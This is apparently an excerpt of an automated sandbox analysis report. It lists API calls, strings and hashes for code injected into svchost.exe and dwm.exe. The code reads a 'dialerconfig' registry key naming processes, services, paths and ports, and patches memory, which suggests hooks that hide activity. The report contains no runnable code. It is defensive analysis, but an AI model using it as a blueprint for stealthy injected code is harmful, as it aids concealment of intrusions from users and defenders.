GetConsoleOutputCP.KERNEL32 ref: 0000014E41FE20D7
WriteFile.KERNEL32 ref: 0000014E41FE239F
WriteFile.KERNEL32 ref: 0000014E41FE23E5
GetLastError.KERNEL32 ref: 0000014E41FE249B

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: afeff5cfcaf4403b8b152d041e9c12e6ce2064c04c3d4c674498ddf2345b7502
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: 44D1D072718B8089EB11CFA9D4443ECBBF1FB54798F194216CE5A97BAAEA34C507C350

Function 0000014E41FE2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 0000014E41FE2A9C
GetLastError.KERNEL32 ref: 0000014E41FE2B27

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: cea13cf84bf215eda1d4e32a4ca8aa5317b936fd82c1a643056d64915862160e
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: 2091B372708B5485FF60DFA994883EDABE0BB44B98F1D4109DE0A977A5EB74C483C720

Function 0000014E41FD7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000014E41FD798C
GetCurrentThreadId.KERNEL32 ref: 0000014E41FD799A
GetCurrentProcessId.KERNEL32 ref: 0000014E41FD79A6
QueryPerformanceCounter.KERNEL32 ref: 0000014E41FD79B6

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: dfc3c1974cbad934db9993865ec08b5f9e443c71fc6a37ba405ddabd85e8d405
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: 65113032714F4589EF00CF60E8583E873B4FB59B68F480E25DA6D867A4DF78C1998390

Function 0000014E41FD253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000014E41FD2620
StrCpyW.SHLWAPI ref: 0000014E41FD2639

Strings

\\.\pipe\, xrefs: 0000014E41FD262B

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: a326b1bb8bb403e4a0d4c0446bf3a53fe52e6195dedbf9b24ed740f8b36a4abd
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: B171C236304B8185EF359E65D8483FAA7D4FB85784F4A0126DE0B83BA9DF35C6468750

Function 0000014E41FA9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000014E41FA9EB7

Strings

MOC, xrefs: 0000014E41FA9E7C
RCC, xrefs: 0000014E41FA9E85

Memory Dump Source

Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 9082f48436bddb50fbe074ea12ed5132107a6f235155bfae31550afec4f2ce97
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: ED613736A00B848AEB20DFA5D4843DDB7A0FB44BC8F184215EF4957FA9DB78D596C720

Function 0000014E41FD2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000014E41FD2416
StrCpyW.SHLWAPI ref: 0000014E41FD242D

Strings

\\.\pipe\, xrefs: 0000014E41FD2421

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction ID: cc360d09ba06bcdff2f15c29ced7a4e175476a6bb9ba5d9fe31b0890df6299d6
Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction Fuzzy Hash: 7851E73230478181FF259A69A55C3FAE7E1FBC6750F8D0125DE4B83B6ECA39C50687A0

Function 0000014E41FE26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000014E41FE2807
GetLastError.KERNEL32 ref: 0000014E41FE2829

Strings

U, xrefs: 0000014E41FE27B3

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: c83ac0f76dcb79476ddf21a95a19c8a865843251dc56904ff8b0029dd694ac40
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: E941A232318B8082DF20CF65E8483E9A7A0FB98794F494022EE4EC77A4EB7CC542C750

Function 0000014E41FD94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000014E41FD94F0
RaiseException.KERNEL32 ref: 0000014E41FD9531

Strings

csm, xrefs: 0000014E41FD951E

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: 558f2c2fa83ee08c27e1fc5abc980bded73aea70065ff57803d74eae209385c4
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: 0F112832218B8482EF618B15F448399B7E5FB88B94F5D8220EE8D47B69DF3DC552CB00

Function 0000014E41FA7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 0000014E41FA737C

Strings

riptor at (, xrefs: 0000014E41FA7364
ierarchy Descriptor', xrefs: 0000014E41FA7381

Memory Dump Source

Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: eb669838bcd11bd9391b268dc568cb615196d67751b03d9664e942e19c7f9c9a
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: F0E08671740B4490DF018F21E8442D873E0EF59B64B8C9122D95C46331FA3CD1FAC310

Function 0000014E41FA73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 0000014E41FA73D8

Strings

riptor at (, xrefs: 0000014E41FA73C0
Locator', xrefs: 0000014E41FA73DD

Memory Dump Source

Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: dcf211704ab779cfcff42d5391f5e7064cd144a077eba1243619bea389c199af
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: 92E08671740B4480EF028F21D4401D8B3A0FB59B54B8C9122C94C46331EA3CD1E6C310

Function 0000014E41FD1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000014E41FD1C2D
HeapAlloc.KERNEL32 ref: 0000014E41FD1C3B
GetProcessHeap.KERNEL32 ref: 0000014E41FD1C77
HeapFree.KERNEL32 ref: 0000014E41FD1C85

Part of subcall function 0000014E41FD152C: StrCmpIW.SHLWAPI ref: 0000014E41FD155D

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: f9751e398ec6f9e8c393d2d9c50e353c79f978f663c39b1dde9fddacf25f1213
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: E2115535705B8881EF059B66A8082AAB3E1FB89FD0F1D40289E4E83776DF78C842C310

Function 0000014E41FD1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000014E41FD126E
HeapAlloc.KERNEL32 ref: 0000014E41FD127D
GetProcessHeap.KERNEL32 ref: 0000014E41FD1297
HeapAlloc.KERNEL32 ref: 0000014E41FD12A8

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: 58e4b1372e48106c13d9c210e95dfed249a6192135837390fc88e392b1da2cd8
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 52E0393570170886EB058B62D80838AB7E1FB89F26F0A8028890947361DF7DC49AC760

Analysis Process: dwm.exePID: 996, Parent PID: 2120COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	95.2%
Signature Coverage:	0%
Total number of Nodes:	126
Total number of Limit Nodes:	16

Executed Functions

Function 000001D15B081628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001D15B081633
HeapAlloc.KERNEL32 ref: 000001D15B081642

Part of subcall function 000001D15B081268: GetProcessHeap.KERNEL32 ref: 000001D15B08126E
Part of subcall function 000001D15B081268: HeapAlloc.KERNEL32 ref: 000001D15B08127D
Part of subcall function 000001D15B081268: GetProcessHeap.KERNEL32 ref: 000001D15B081297
Part of subcall function 000001D15B081268: HeapAlloc.KERNEL32 ref: 000001D15B0812A8

RegOpenKeyExW.ADVAPI32 ref: 000001D15B0816B2
RegOpenKeyExW.ADVAPI32 ref: 000001D15B0816DF
RegCloseKey.ADVAPI32 ref: 000001D15B0816F9
RegOpenKeyExW.ADVAPI32 ref: 000001D15B081719
RegCloseKey.ADVAPI32 ref: 000001D15B081734
RegOpenKeyExW.ADVAPI32 ref: 000001D15B081754
RegCloseKey.ADVAPI32 ref: 000001D15B08176F
RegOpenKeyExW.ADVAPI32 ref: 000001D15B08178F
RegCloseKey.ADVAPI32 ref: 000001D15B0817AA
RegOpenKeyExW.ADVAPI32 ref: 000001D15B0817CA
RegCloseKey.ADVAPI32 ref: 000001D15B0817E5
RegOpenKeyExW.ADVAPI32 ref: 000001D15B081805
RegCloseKey.ADVAPI32 ref: 000001D15B081820
RegOpenKeyExW.ADVAPI32 ref: 000001D15B081840
RegCloseKey.ADVAPI32 ref: 000001D15B08185B
RegOpenKeyExW.ADVAPI32 ref: 000001D15B08187B
RegCloseKey.ADVAPI32 ref: 000001D15B081896
RegCloseKey.ADVAPI32 ref: 000001D15B0818A0

Part of subcall function 000001D15B0812BC: RegQueryInfoKeyW.ADVAPI32 ref: 000001D15B081319
Part of subcall function 000001D15B0812BC: GetProcessHeap.KERNEL32 ref: 000001D15B081327
Part of subcall function 000001D15B0812BC: HeapAlloc.KERNEL32 ref: 000001D15B081338
Part of subcall function 000001D15B0812BC: RegEnumValueW.ADVAPI32 ref: 000001D15B081397
Part of subcall function 000001D15B0812BC: GetProcessHeap.KERNEL32 ref: 000001D15B0813DF
Part of subcall function 000001D15B0812BC: HeapAlloc.KERNEL32 ref: 000001D15B0813ED
Part of subcall function 000001D15B0812BC: GetProcessHeap.KERNEL32 ref: 000001D15B08140A
Part of subcall function 000001D15B0812BC: HeapFree.KERNEL32 ref: 000001D15B081418
Part of subcall function 000001D15B0812BC: lstrlenW.KERNEL32 ref: 000001D15B081421
Part of subcall function 000001D15B0812BC: GetProcessHeap.KERNEL32 ref: 000001D15B08142F
Part of subcall function 000001D15B0812BC: HeapAlloc.KERNEL32 ref: 000001D15B08143D

Strings

SOFTWARE\dialerconfig, xrefs: 000001D15B081692
pid, xrefs: 000001D15B081712
tcp_local, xrefs: 000001D15B0817FE
process_names, xrefs: 000001D15B08174D
udp, xrefs: 000001D15B081874
paths, xrefs: 000001D15B081788
tcp_remote, xrefs: 000001D15B081839
startup, xrefs: 000001D15B0816D5
service_names, xrefs: 000001D15B0817C3

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: 936e08a5784faddd71ec8481daaef1888ccc5e724139e2c30c061473abb367fd
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: EE71E736211A10B6EB109FA5F9917D923B4FBCAB88F101212EE4E57B69DF3CC555CB40

Function 000001D15B083790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000001D15B08379E
GetCurrentProcess.KERNEL32 ref: 000001D15B0837CC
VirtualProtectEx.KERNEL32 ref: 000001D15B0837EE
GetCurrentProcess.KERNEL32 ref: 000001D15B083809
VirtualProtectEx.KERNEL32 ref: 000001D15B08382A

Strings

wr, xrefs: 000001D15B0837FF

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: 4a515bde4b2461a8f5fb9f6f0e449ae6deae7049c49fc889126790a67df4688d
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: 53113C36704741A2FF149B91F5047AA72B0F7CAB85F44422AEE8907764EF3DC645CB04

Function 000001D15B085B30 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001D15B085B6B
GetThreadContext.KERNEL32 ref: 000001D15B085CD5

Part of subcall function 000001D15B085960: GetCurrentThreadId.KERNEL32 ref: 000001D15B085964

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
Instruction ID: a9ddba6ab40a57e5954b64d7801577c751b21e6e5c29d69ff4d08c1bab641e63
Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
Instruction Fuzzy Hash: 58D18876204B88A6DA709B46F59039A77B0F7C9B84F500617EA8D47BA9DF7CC641CF40

Function 000001D15B0850D0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001D15B085156

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
Instruction ID: 8c437e6aef1af61c98ea568c04f02af8550e8c557b1cc59ed4192e6d07aa9ea6
Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
Instruction Fuzzy Hash: BE02A736219B84A6EB608B95F59039AB7B0F3C6794F101116FA8E87BA9DF7CC554CF00

Function 000001D15B0839E0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001D15B083A66
VirtualAlloc.KERNEL32 ref: 000001D15B083AA0

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
Instruction ID: c9029ad0ab38d03f3e4924db51341ba363c4bf8fd9b8a86da5b06627f527b883
Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
Instruction Fuzzy Hash: F3311232219A84B1EA30DA95F15539E66B4F3CA784F500766F5CE46B98DF7DC7408F04

Function 000001D15B08328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001D15B0832AE
PathFindFileNameW.SHLWAPI ref: 000001D15B0832BD

Part of subcall function 000001D15B083844: StrCmpNIW.SHLWAPI ref: 000001D15B08385C

Part of subcall function 000001D15B083790: GetModuleHandleW.KERNEL32 ref: 000001D15B08379E
Part of subcall function 000001D15B083790: GetCurrentProcess.KERNEL32 ref: 000001D15B0837CC
Part of subcall function 000001D15B083790: VirtualProtectEx.KERNEL32 ref: 000001D15B0837EE
Part of subcall function 000001D15B083790: GetCurrentProcess.KERNEL32 ref: 000001D15B083809
Part of subcall function 000001D15B083790: VirtualProtectEx.KERNEL32 ref: 000001D15B08382A

CreateThread.KERNEL32 ref: 000001D15B08330B

Part of subcall function 000001D15B081D14: GetCurrentThread.KERNEL32 ref: 000001D15B081D1F

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: fc1e4ecd937a7a671cec7b3f9f028fd770ee227131cf0e8c00b683bd31e78c7d
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: 3F112D71614641B2FB609BE1FB453DA22B4BBD6345F504727B94682591EF7CC2988E10

Function 000001D15B084DF0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001D15B084DF4
VirtualProtect.KERNEL32 ref: 000001D15B084E37
FlushInstructionCache.KERNEL32 ref: 000001D15B084E4C

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
Instruction ID: a6fec403492fee1e0e4e53f40d37bcee676a3ef256dd91b0934c39ce40200f87
Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
Instruction Fuzzy Hash: 0DF0B736218B04A0D670DB85F55179AABB0F3C9BE4F545216FA8E47B69CB3CC7908F40

Function 000001D15B05273C Relevance: 3.2, APIs: 2, Instructions: 187
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001D15B0527DB
LoadLibraryA.KERNELBASE ref: 000001D15B05285E

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: ec36fef82f7ded98fe8ced6437409f38e7e62c543dcb51e3e168834caca3b8b7
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: AD610672B01694A7DB54CF95E2007BDB3B2FB95B94F588226DE5907BC8DA3CD852CB00

Function 000001D15B081ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001D15B081628: GetProcessHeap.KERNEL32 ref: 000001D15B081633
Part of subcall function 000001D15B081628: HeapAlloc.KERNEL32 ref: 000001D15B081642
Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B0816B2
Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B0816DF
Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B0816F9
Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B081719
Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B081734
Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B081754
Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B08176F
Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B08178F
Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B0817AA
Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B0817CA

Sleep.KERNEL32 ref: 000001D15B081AD7
SleepEx.KERNELBASE ref: 000001D15B081ADD

Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B0817E5
Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B081805
Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B081820
Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B081840
Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B08185B
Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B08187B
Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B081896
Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B0818A0

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: 13fb83884ee3ddaaf7274ee5dc5e02d8c9ede86edda392f7dac3e843c5ce3e37
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: 29312D31211641B1FB509BA2FB413E913B5BFCEBD0F245623AE09872A5FF28C6518A10

Non-executed Functions

Function 000001D15B082B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001D15B082BD0
lstrlenW.KERNEL32 ref: 000001D15B082E0A

Part of subcall function 000001D15B08199C: OpenProcess.KERNEL32 ref: 000001D15B0819C2
Part of subcall function 000001D15B08199C: K32GetModuleFileNameExW.KERNEL32 ref: 000001D15B0819E0
Part of subcall function 000001D15B08199C: PathFindFileNameW.SHLWAPI ref: 000001D15B0819EF
Part of subcall function 000001D15B08199C: lstrlenW.KERNEL32 ref: 000001D15B0819FB
Part of subcall function 000001D15B08199C: StrCpyW.SHLWAPI ref: 000001D15B081A0E
Part of subcall function 000001D15B08199C: CloseHandle.KERNEL32 ref: 000001D15B081A1C

GetProcAddress.KERNEL32 ref: 000001D15B082BE5

Part of subcall function 000001D15B08152C: StrCmpIW.SHLWAPI ref: 000001D15B08155D

Part of subcall function 000001D15B083844: StrCmpNIW.SHLWAPI ref: 000001D15B08385C

